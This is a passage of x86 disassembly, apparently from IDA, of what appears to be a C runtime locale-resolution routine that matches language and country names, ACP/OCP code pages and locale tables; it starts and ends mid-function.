loc_42ACF2: ; CODE XREF: sub_42ACC0+D�j
cmp [ebp+arg_0], 0
jnz short loc_42AD02
call sub_42B5E0
jmp loc_42ADCE
; ---------------------------------------------------------------------------
loc_42AD02: ; CODE XREF: sub_42ACC0+36�j
mov edx, [ebp+arg_0]
mov dword_492318, edx
cmp dword_492318, 0
jz short loc_42AD34
mov eax, dword_492318
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42AD34
push offset dword_492318
push 40h
push offset off_443CC0
call sub_42AEC0
add esp, 0Ch
loc_42AD34: ; CODE XREF: sub_42ACC0+52�j
; sub_42ACC0+5E�j
mov edx, [ebp+arg_0]
add edx, 40h
mov dword_49231C, edx
cmp dword_49231C, 0
jz short loc_42AD69
mov eax, dword_49231C
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42AD69
push offset dword_49231C
push 16h
push offset off_443C08
call sub_42AEC0
add esp, 0Ch
loc_42AD69: ; CODE XREF: sub_42ACC0+87�j
; sub_42ACC0+93�j
mov dword_492320, 0
cmp dword_492318, 0
jz short loc_42ADAD
mov edx, dword_492318
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42ADAD
cmp dword_49231C, 0
jz short loc_42ADA6
mov ecx, dword_49231C
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42ADA6
call sub_42AF50
jmp short loc_42ADAB
; ---------------------------------------------------------------------------
loc_42ADA6: ; CODE XREF: sub_42ACC0+D0�j
; sub_42ACC0+DD�j
call sub_42B340
loc_42ADAB: ; CODE XREF: sub_42ACC0+E4�j
jmp short loc_42ADCE
; ---------------------------------------------------------------------------
loc_42ADAD: ; CODE XREF: sub_42ACC0+BA�j
; sub_42ACC0+C7�j
cmp dword_49231C, 0
jz short loc_42ADC9
mov eax, dword_49231C
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42ADC9
call sub_42B4E0
jmp short loc_42ADCE
; ---------------------------------------------------------------------------
loc_42ADC9: ; CODE XREF: sub_42ACC0+F4�j
; sub_42ACC0+100�j
call sub_42B5E0
loc_42ADCE: ; CODE XREF: sub_42ACC0+3D�j
; sub_42ACC0:loc_42ADAB�j ...
cmp dword_492320, 0
jnz short loc_42ADDE
xor eax, eax
jmp loc_42AEBC
; ---------------------------------------------------------------------------
loc_42ADDE: ; CODE XREF: sub_42ACC0+115�j
mov edx, [ebp+arg_0]
add edx, 80h
push edx
call sub_42B610
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_42AE0C
mov eax, [ebp+var_4]
and eax, 0FFFFh
push eax
call ds:dword_4942B0
test eax, eax
jnz short loc_42AE13
loc_42AE0C: ; CODE XREF: sub_42ACC0+137�j
xor eax, eax
jmp loc_42AEBC
; ---------------------------------------------------------------------------
loc_42AE13: ; CODE XREF: sub_42ACC0+14A�j
push 1
mov ecx, dword_492308
push ecx
call ds:dword_4942B4
test eax, eax
jnz short loc_42AE2D
xor eax, eax
jmp loc_42AEBC
; ---------------------------------------------------------------------------
loc_42AE2D: ; CODE XREF: sub_42ACC0+164�j
cmp [ebp+arg_4], 0
jz short loc_42AE58
mov edx, [ebp+arg_4]
mov ax, word ptr dword_492308
mov [edx], ax
mov ecx, [ebp+arg_4]
mov dx, word ptr dword_492324
mov [ecx+2], dx
mov eax, [ebp+arg_4]
mov cx, word ptr [ebp+var_4]
mov [eax+4], cx
loc_42AE58: ; CODE XREF: sub_42ACC0+171�j
cmp [ebp+arg_8], 0
jz short loc_42AEB7
push 40h
mov edx, [ebp+arg_8]
push edx
push 1001h
mov eax, dword_492308
push eax
call dword_492328
test eax, eax
jnz short loc_42AE7D
xor eax, eax
jmp short loc_42AEBC
; ---------------------------------------------------------------------------
loc_42AE7D: ; CODE XREF: sub_42ACC0+1B7�j
push 40h
mov ecx, [ebp+arg_8]
add ecx, 40h
push ecx
push 1002h
mov edx, dword_492324
push edx
call dword_492328
test eax, eax
jnz short loc_42AEA0
xor eax, eax
jmp short loc_42AEBC
; ---------------------------------------------------------------------------
loc_42AEA0: ; CODE XREF: sub_42ACC0+1DA�j
push 0Ah
mov eax, [ebp+arg_8]
add eax, 80h
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_4262C0
add esp, 0Ch
loc_42AEB7: ; CODE XREF: sub_42ACC0+19C�j
mov eax, 1
loc_42AEBC: ; CODE XREF: sub_42ACC0+119�j
; sub_42ACC0+14E�j ...
mov esp, ebp
pop ebp
retn
sub_42ACC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AEC0 proc near ; CODE XREF: sub_42ACC0+6C�p
; sub_42ACC0+A1�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 1
mov [ebp+var_C], 0
loc_42AED4: ; CODE XREF: sub_42AEC0:loc_42AF3C�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jg short loc_42AF3E
cmp [ebp+var_8], 0
jz short loc_42AF3E
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*8]
push eax
mov ecx, [ebp+arg_8]
mov edx, [ecx]
push edx
call sub_42F560
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_42AF22
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea edx, [ecx+eax*8+4]
mov eax, [ebp+arg_8]
mov [eax], edx
jmp short loc_42AF3C
; ---------------------------------------------------------------------------
loc_42AF22: ; CODE XREF: sub_42AEC0+4F�j
cmp [ebp+var_8], 0
jge short loc_42AF33
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+arg_4], ecx
jmp short loc_42AF3C
; ---------------------------------------------------------------------------
loc_42AF33: ; CODE XREF: sub_42AEC0+66�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_C], edx
loc_42AF3C: ; CODE XREF: sub_42AEC0+60�j
; sub_42AEC0+71�j
jmp short loc_42AED4
; ---------------------------------------------------------------------------
loc_42AF3E: ; CODE XREF: sub_42AEC0+1A�j
; sub_42AEC0+20�j
mov esp, ebp
pop ebp
retn
sub_42AEC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AF50 proc near ; CODE XREF: sub_42ACC0+DF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, dword_492318
push eax
call sub_418E70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov dword_492314, ecx
mov edx, dword_49231C
push edx
call sub_418E70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov dword_49230C, ecx
mov dword_492308, 0
cmp dword_492314, 0
jz short loc_42AFA9
mov [ebp+var_4], 2
jmp short loc_42AFBB
; ---------------------------------------------------------------------------
loc_42AFA9: ; CODE XREF: sub_42AF50+4E�j
mov edx, dword_492318
push edx
call sub_42B9F0
add esp, 4
mov [ebp+var_4], eax
loc_42AFBB: ; CODE XREF: sub_42AF50+57�j
mov eax, [ebp+var_4]
mov dword_492310, eax
push 1
push offset sub_42B010
call ds:dword_4942AC
mov ecx, dword_492320
and ecx, 100h
test ecx, ecx
jz short loc_42AFFC
mov edx, dword_492320
and edx, 200h
test edx, edx
jz short loc_42AFFC
mov eax, dword_492320
and eax, 7
test eax, eax
jnz short loc_42B006
loc_42AFFC: ; CODE XREF: sub_42AF50+8E�j
; sub_42AF50+9E�j
mov dword_492320, 0
loc_42B006: ; CODE XREF: sub_42AF50+AA�j
mov esp, ebp
pop ebp
retn
sub_42AF50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B010 proc near ; DATA XREF: sub_42AF50+75�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_0]
push eax
call sub_42B970
add esp, 4
mov [ebp+var_7C], eax
push 78h
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_49230C
neg edx
sbb edx, edx
and edx, 0FFFFF005h
add edx, 1002h
push edx
mov eax, [ebp+var_7C]
push eax
call dword_492328
test eax, eax
jnz short loc_42B064
mov dword_492320, 0
mov eax, 1
jmp loc_42B32E
; ---------------------------------------------------------------------------
loc_42B064: ; CODE XREF: sub_42B010+3E�j
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_49231C
push edx
call sub_42F560
add esp, 8
test eax, eax
jnz loc_42B19F
push 78h
lea eax, [ebp+var_78]
push eax
mov ecx, dword_492314
neg ecx
sbb ecx, ecx
and ecx, 0FFFFF002h
add ecx, 1001h
push ecx
mov edx, [ebp+var_7C]
push edx
call dword_492328
test eax, eax
jnz short loc_42B0BE
mov dword_492320, 0
mov eax, 1
jmp loc_42B32E
; ---------------------------------------------------------------------------
loc_42B0BE: ; CODE XREF: sub_42B010+98�j
lea eax, [ebp+var_78]
push eax
mov ecx, dword_492318
push ecx
call sub_42F560
add esp, 8
test eax, eax
jnz short loc_42B100
mov edx, dword_492320
or edx, 304h
mov dword_492320, edx
mov eax, [ebp+var_7C]
mov dword_492324, eax
mov ecx, dword_492324
mov dword_492308, ecx
jmp loc_42B19F
; ---------------------------------------------------------------------------
loc_42B100: ; CODE XREF: sub_42B010+C3�j
mov edx, dword_492320
and edx, 2
test edx, edx
jnz loc_42B19F
cmp dword_492310, 0
jz short loc_42B16D
mov eax, dword_492310
push eax
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_492318
push edx
call sub_42F630
add esp, 0Ch
test eax, eax
jnz short loc_42B16D
mov eax, dword_492320
or al, 2
mov dword_492320, eax
mov ecx, [ebp+var_7C]
mov dword_492324, ecx
mov edx, dword_492318
push edx
call sub_418E70
add esp, 4
cmp eax, dword_492310
jnz short loc_42B16B
mov eax, [ebp+var_7C]
mov dword_492308, eax
loc_42B16B: ; CODE XREF: sub_42B010+151�j
jmp short loc_42B19F
; ---------------------------------------------------------------------------
loc_42B16D: ; CODE XREF: sub_42B010+108�j
; sub_42B010+125�j
mov ecx, dword_492320
and ecx, 1
test ecx, ecx
jnz short loc_42B19F
mov edx, [ebp+var_7C]
push edx
call sub_42B6B0
add esp, 4
test eax, eax
jz short loc_42B19F
mov eax, dword_492320
or al, 1
mov dword_492320, eax
mov ecx, [ebp+var_7C]
mov dword_492324, ecx
loc_42B19F: ; CODE XREF: sub_42B010+69�j
; sub_42B010+EB�j ...
mov edx, dword_492320
and edx, 300h
cmp edx, 300h
jz loc_42B321
push 78h
lea eax, [ebp+var_78]
push eax
mov ecx, dword_492314
neg ecx
sbb ecx, ecx
and ecx, 0FFFFF002h
add ecx, 1001h
push ecx
mov edx, [ebp+var_7C]
push edx
call dword_492328
test eax, eax
jnz short loc_42B1F6
mov dword_492320, 0
mov eax, 1
jmp loc_42B32E
; ---------------------------------------------------------------------------
loc_42B1F6: ; CODE XREF: sub_42B010+1D0�j
lea eax, [ebp+var_78]
push eax
mov ecx, dword_492318
push ecx
call sub_42F560
add esp, 8
test eax, eax
jnz loc_42B2C0
mov edx, dword_492320
or dh, 2
mov dword_492320, edx
cmp dword_492314, 0
jz short loc_42B24A
mov eax, dword_492320
or ah, 1
mov dword_492320, eax
cmp dword_492308, 0
jnz short loc_42B248
mov ecx, [ebp+var_7C]
mov dword_492308, ecx
loc_42B248: ; CODE XREF: sub_42B010+22D�j
jmp short loc_42B2BE
; ---------------------------------------------------------------------------
loc_42B24A: ; CODE XREF: sub_42B010+217�j
cmp dword_492310, 0
jz short loc_42B29F
mov edx, dword_492318
push edx
call sub_418E70
add esp, 4
cmp eax, dword_492310
jnz short loc_42B29F
push 1
mov eax, [ebp+var_7C]
push eax
call sub_42B700
add esp, 8
test eax, eax
jz short loc_42B29D
mov ecx, dword_492320
or ch, 1
mov dword_492320, ecx
cmp dword_492308, 0
jnz short loc_42B29D
mov edx, [ebp+var_7C]
mov dword_492308, edx
loc_42B29D: ; CODE XREF: sub_42B010+26A�j
; sub_42B010+282�j
jmp short loc_42B2BE
; ---------------------------------------------------------------------------
loc_42B29F: ; CODE XREF: sub_42B010+241�j
; sub_42B010+258�j
mov eax, dword_492320
or ah, 1
mov dword_492320, eax
cmp dword_492308, 0
jnz short loc_42B2BE
mov ecx, [ebp+var_7C]
mov dword_492308, ecx
loc_42B2BE: ; CODE XREF: sub_42B010:loc_42B248�j
; sub_42B010:loc_42B29D�j ...
jmp short loc_42B321
; ---------------------------------------------------------------------------
loc_42B2C0: ; CODE XREF: sub_42B010+1FB�j
cmp dword_492314, 0
jnz short loc_42B321
cmp dword_492310, 0
jz short loc_42B321
mov edx, dword_492310
push edx
lea eax, [ebp+var_78]
push eax
mov ecx, dword_492318
push ecx
call sub_42F630
add esp, 0Ch
test eax, eax
jnz short loc_42B321
push 0
mov edx, [ebp+var_7C]
push edx
call sub_42B700
add esp, 8
test eax, eax
jz short loc_42B321
mov eax, dword_492320
or ah, 1
mov dword_492320, eax
cmp dword_492308, 0
jnz short loc_42B321
mov ecx, [ebp+var_7C]
mov dword_492308, ecx
loc_42B321: ; CODE XREF: sub_42B010+1A1�j
; sub_42B010:loc_42B2BE�j ...
mov eax, dword_492320
and eax, 4
neg eax
sbb eax, eax
inc eax
loc_42B32E: ; CODE XREF: sub_42B010+4F�j
; sub_42B010+A9�j ...
mov esp, ebp
pop ebp
retn 4
sub_42B010 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B340 proc near ; CODE XREF: sub_42ACC0:loc_42ADA6�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, dword_492318
push eax
call sub_418E70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov dword_492314, ecx
cmp dword_492314, 0
jz short loc_42B372
mov [ebp+var_4], 2
jmp short loc_42B384
; ---------------------------------------------------------------------------
loc_42B372: ; CODE XREF: sub_42B340+27�j
mov edx, dword_492318
push edx
call sub_42B9F0
add esp, 4
mov [ebp+var_4], eax
loc_42B384: ; CODE XREF: sub_42B340+30�j
mov eax, [ebp+var_4]
mov dword_492310, eax
push 1
push offset sub_42B3C0
call ds:dword_4942AC
mov ecx, dword_492320
and ecx, 4
test ecx, ecx
jnz short loc_42B3B0
mov dword_492320, 0
loc_42B3B0: ; CODE XREF: sub_42B340+64�j
mov esp, ebp
pop ebp
retn
sub_42B340 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B3C0 proc near ; DATA XREF: sub_42B340+4E�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_0]
push eax
call sub_42B970
add esp, 4
mov [ebp+var_7C], eax
push 78h
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_492314
neg edx
sbb edx, edx
and edx, 0FFFFF002h
add edx, 1001h
push edx
mov eax, [ebp+var_7C]
push eax
call dword_492328
test eax, eax
jnz short loc_42B414
mov dword_492320, 0
mov eax, 1
jmp loc_42B4D9
; ---------------------------------------------------------------------------
loc_42B414: ; CODE XREF: sub_42B3C0+3E�j
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_492318
push edx
call sub_42F560
add esp, 8
test eax, eax
jnz short loc_42B469
cmp dword_492314, 0
jnz short loc_42B446
push 1
mov eax, [ebp+var_7C]
push eax
call sub_42B700
add esp, 8
test eax, eax
jz short loc_42B467
loc_42B446: ; CODE XREF: sub_42B3C0+72�j
mov ecx, [ebp+var_7C]
mov dword_492324, ecx
mov edx, dword_492324
mov dword_492308, edx
mov eax, dword_492320
or al, 4
mov dword_492320, eax
loc_42B467: ; CODE XREF: sub_42B3C0+84�j
jmp short loc_42B4CC
; ---------------------------------------------------------------------------
loc_42B469: ; CODE XREF: sub_42B3C0+69�j
cmp dword_492314, 0
jnz short loc_42B4CC
cmp dword_492310, 0
jz short loc_42B4CC
mov ecx, dword_492310
push ecx
lea edx, [ebp+var_78]
push edx
mov eax, dword_492318
push eax
call sub_42F630
add esp, 0Ch
test eax, eax
jnz short loc_42B4CC
push 0
mov ecx, [ebp+var_7C]
push ecx
call sub_42B700
add esp, 8
test eax, eax
jz short loc_42B4CC
mov edx, [ebp+var_7C]
mov dword_492324, edx
mov eax, dword_492324
mov dword_492308, eax
mov ecx, dword_492320
or ecx, 4
mov dword_492320, ecx
loc_42B4CC: ; CODE XREF: sub_42B3C0:loc_42B467�j
; sub_42B3C0+B0�j ...
mov eax, dword_492320
and eax, 4
neg eax
sbb eax, eax
inc eax
loc_42B4D9: ; CODE XREF: sub_42B3C0+4F�j
mov esp, ebp
pop ebp
retn 4
sub_42B3C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B4E0 proc near ; CODE XREF: sub_42ACC0+102�p
push ebp
mov ebp, esp
mov eax, dword_49231C
push eax
call sub_418E70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov dword_49230C, ecx
push 1
push offset sub_42B530
call ds:dword_4942AC
mov edx, dword_492320
and edx, 4
test edx, edx
jnz short loc_42B523
mov dword_492320, 0
loc_42B523: ; CODE XREF: sub_42B4E0+37�j
pop ebp
retn
sub_42B4E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B530 proc near ; DATA XREF: sub_42B4E0+21�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_0]
push eax
call sub_42B970
add esp, 4
mov [ebp+var_7C], eax
push 78h
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_49230C
neg edx
sbb edx, edx
and edx, 0FFFFF005h
add edx, 1002h
push edx
mov eax, [ebp+var_7C]
push eax
call dword_492328
test eax, eax
jnz short loc_42B581
mov dword_492320, 0
mov eax, 1
jmp short loc_42B5D6
; ---------------------------------------------------------------------------
loc_42B581: ; CODE XREF: sub_42B530+3E�j
lea ecx, [ebp+var_78]
push ecx
mov edx, dword_49231C
push edx
call sub_42F560
add esp, 8
test eax, eax
jnz short loc_42B5C9
mov eax, [ebp+var_7C]
push eax
call sub_42B6B0
add esp, 4
test eax, eax
jz short loc_42B5C9
mov ecx, [ebp+var_7C]
mov dword_492324, ecx
mov edx, dword_492324
mov dword_492308, edx
mov eax, dword_492320
or al, 4
mov dword_492320, eax
loc_42B5C9: ; CODE XREF: sub_42B530+66�j
; sub_42B530+76�j
mov eax, dword_492320
and eax, 4
neg eax
sbb eax, eax
inc eax
loc_42B5D6: ; CODE XREF: sub_42B530+4F�j
mov esp, ebp
pop ebp
retn 4
sub_42B530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B5E0 proc near ; CODE XREF: sub_42ACC0+38�p
; sub_42ACC0:loc_42ADC9�p
push ebp
mov ebp, esp
mov eax, dword_492320
or eax, 104h
mov dword_492320, eax
call ds:dword_4942A8
mov dword_492324, eax
mov ecx, dword_492324
mov dword_492308, ecx
pop ebp
retn
sub_42B5E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B610 proc near ; CODE XREF: sub_42ACC0+128�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jz short loc_42B63B
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42B63B
push offset aAcp ; "ACP"
mov edx, [ebp+arg_0]
push edx
call sub_419360
add esp, 8
test eax, eax
jnz short loc_42B663
loc_42B63B: ; CODE XREF: sub_42B610+A�j
; sub_42B610+14�j
push 8
lea eax, [ebp+var_8]
push eax
push 1004h
mov ecx, dword_492324
push ecx
call dword_492328
test eax, eax
jnz short loc_42B65B
xor eax, eax
jmp short loc_42B6A7
; ---------------------------------------------------------------------------
loc_42B65B: ; CODE XREF: sub_42B610+45�j
lea edx, [ebp+var_8]
mov [ebp+arg_0], edx
jmp short loc_42B69B
; ---------------------------------------------------------------------------
loc_42B663: ; CODE XREF: sub_42B610+29�j
push offset aOcp ; "OCP"
mov eax, [ebp+arg_0]
push eax
call sub_419360
add esp, 8
test eax, eax
jnz short loc_42B69B
push 8
lea ecx, [ebp+var_8]
push ecx
push 0Bh
mov edx, dword_492324
push edx
call dword_492328
test eax, eax
jnz short loc_42B695
xor eax, eax
jmp short loc_42B6A7
; ---------------------------------------------------------------------------
loc_42B695: ; CODE XREF: sub_42B610+7F�j
lea eax, [ebp+var_8]
mov [ebp+arg_0], eax
loc_42B69B: ; CODE XREF: sub_42B610+51�j
; sub_42B610+66�j
mov ecx, [ebp+arg_0]
push ecx
call sub_4194F0
add esp, 4
loc_42B6A7: ; CODE XREF: sub_42B610+49�j
; sub_42B610+83�j
mov esp, ebp
pop ebp
retn
sub_42B610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B6B0 proc near ; CODE XREF: sub_42B010+16E�p
; sub_42B530+6C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov ax, [ebp+arg_0]
mov word ptr [ebp+var_4], ax
mov [ebp+var_8], 0
jmp short loc_42B6D0
; ---------------------------------------------------------------------------
loc_42B6C7: ; CODE XREF: sub_42B6B0:loc_42B6F4�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_42B6D0: ; CODE XREF: sub_42B6B0+15�j
cmp [ebp+var_8], 0Ah
jnb short loc_42B6F6
mov edx, [ebp+var_4]
and edx, 0FFFFh
mov eax, [ebp+var_8]
xor ecx, ecx
mov cx, word_443BF4[eax*2]
cmp edx, ecx
jnz short loc_42B6F4
xor eax, eax
jmp short loc_42B6FB
; ---------------------------------------------------------------------------
loc_42B6F4: ; CODE XREF: sub_42B6B0+3E�j
jmp short loc_42B6C7
; ---------------------------------------------------------------------------
loc_42B6F6: ; CODE XREF: sub_42B6B0+24�j
mov eax, 1
loc_42B6FB: ; CODE XREF: sub_42B6B0+42�j
mov esp, ebp
pop ebp
retn
sub_42B6B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B700 proc near ; CODE XREF: sub_42B010+260�p
; sub_42B010+2E6�p ...
var_7C = byte ptr -7Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7Ch
push esi
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 3FFh
and eax, 0FFFFh
or ah, 4
and eax, 0FFFFh
mov [ebp+var_4], eax
push 78h
lea ecx, [ebp+var_7C]
push ecx
push 1
mov edx, [ebp+var_4]
push edx
call dword_492328
test eax, eax
jnz short loc_42B73E
xor eax, eax
jmp short loc_42B782
; ---------------------------------------------------------------------------
loc_42B73E: ; CODE XREF: sub_42B700+38�j
lea eax, [ebp+var_7C]
push eax
call sub_42B970
add esp, 4
cmp [ebp+arg_0], eax
jz short loc_42B77D
cmp [ebp+arg_4], 0
jz short loc_42B77D
mov ecx, dword_492318
push ecx
call sub_42B9F0
add esp, 4
mov esi, eax
mov edx, dword_492318
push edx
call sub_418E70
add esp, 4
cmp esi, eax
jnz short loc_42B77D
xor eax, eax
jmp short loc_42B782
; ---------------------------------------------------------------------------
loc_42B77D: ; CODE XREF: sub_42B700+4D�j
; sub_42B700+53�j ...
mov eax, 1
loc_42B782: ; CODE XREF: sub_42B700+3C�j
; sub_42B700+7B�j
pop esi
mov esp, ebp
pop ebp
retn
sub_42B700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B790 proc near ; CODE XREF: sub_42ACC0+F�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 98h
mov [ebp+var_94], 94h
lea eax, [ebp+var_94]
push eax
call ds:dword_4943F4
test eax, eax
jz short loc_42B7C9
cmp [ebp+var_84], 2
jnz short loc_42B7C9
mov [ebp+var_98], 1
jmp short loc_42B7D3
; ---------------------------------------------------------------------------
loc_42B7C9: ; CODE XREF: sub_42B790+22�j
; sub_42B790+2B�j
mov [ebp+var_98], 0
loc_42B7D3: ; CODE XREF: sub_42B790+37�j
mov eax, [ebp+var_98]
mov esp, ebp
pop ebp
retn
sub_42B790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B7E0 proc near ; DATA XREF: sub_42ACC0:loc_42ACE2�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_10], 0
mov [ebp+var_4], 1Ah
mov [ebp+var_8], 0
loc_42B7FB: ; CODE XREF: sub_42B7E0:loc_42B943�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_4]
jg loc_42B948
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
imul ecx, 2Ch
mov edx, [ebp+arg_0]
cmp edx, dword_443750[ecx]
jnz loc_42B91E
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0Bh
ja short loc_42B857
cmp [ebp+var_14], 0Bh
jz loc_42B8C9
cmp [ebp+var_14], 1
jz short loc_42B874
cmp [ebp+var_14], 3
jz short loc_42B896
cmp [ebp+var_14], 7
jz short loc_42B8B8
jmp loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B857: ; CODE XREF: sub_42B7E0+54�j
cmp [ebp+var_14], 1001h
jz short loc_42B885
cmp [ebp+var_14], 1002h
jz short loc_42B8A7
cmp [ebp+var_14], 1004h
jz short loc_42B8DA
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B874: ; CODE XREF: sub_42B7E0+64�j
mov ecx, [ebp+var_C]
imul ecx, 2Ch
add ecx, offset a040a ; "040a"
mov [ebp+var_8], ecx
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B885: ; CODE XREF: sub_42B7E0+7E�j
mov edx, [ebp+var_C]
imul edx, 2Ch
mov eax, off_44375C[edx]
mov [ebp+var_8], eax
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B896: ; CODE XREF: sub_42B7E0+6A�j
mov ecx, [ebp+var_C]
imul ecx, 2Ch
add ecx, offset dword_443760
mov [ebp+var_8], ecx
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B8A7: ; CODE XREF: sub_42B7E0+87�j
mov edx, [ebp+var_C]
imul edx, 2Ch
mov eax, off_443764[edx]
mov [ebp+var_8], eax
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B8B8: ; CODE XREF: sub_42B7E0+70�j
mov ecx, [ebp+var_C]
imul ecx, 2Ch
add ecx, offset dword_443768
mov [ebp+var_8], ecx
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B8C9: ; CODE XREF: sub_42B7E0+5A�j
mov edx, [ebp+var_C]
imul edx, 2Ch
add edx, offset dword_44376C
mov [ebp+var_8], edx
jmp short loc_42B8E8
; ---------------------------------------------------------------------------
loc_42B8DA: ; CODE XREF: sub_42B7E0+90�j
mov eax, [ebp+var_C]
imul eax, 2Ch
add eax, offset a1252 ; "1252"
mov [ebp+var_8], eax
loc_42B8E8: ; CODE XREF: sub_42B7E0+72�j
; sub_42B7E0+92�j ...
cmp [ebp+var_8], 0
jz short loc_42B8F4
cmp [ebp+arg_C], 1
jge short loc_42B8F6
loc_42B8F4: ; CODE XREF: sub_42B7E0+10C�j
jmp short loc_42B948
; ---------------------------------------------------------------------------
loc_42B8F6: ; CODE XREF: sub_42B7E0+112�j
mov ecx, [ebp+arg_C]
sub ecx, 1
push ecx
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_4191A0
add esp, 0Ch
mov ecx, [ebp+arg_8]
add ecx, [ebp+arg_C]
mov byte ptr [ecx-1], 0
mov eax, 1
jmp short loc_42B95E
; ---------------------------------------------------------------------------
loc_42B91E: ; CODE XREF: sub_42B7E0+44�j
mov edx, [ebp+var_C]
imul edx, 2Ch
mov eax, [ebp+arg_0]
cmp eax, dword_443750[edx]
jnb short loc_42B93A
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42B943
; ---------------------------------------------------------------------------
loc_42B93A: ; CODE XREF: sub_42B7E0+14D�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_10], edx
loc_42B943: ; CODE XREF: sub_42B7E0+158�j
jmp loc_42B7FB
; ---------------------------------------------------------------------------
loc_42B948: ; CODE XREF: sub_42B7E0+21�j
; sub_42B7E0:loc_42B8F4�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
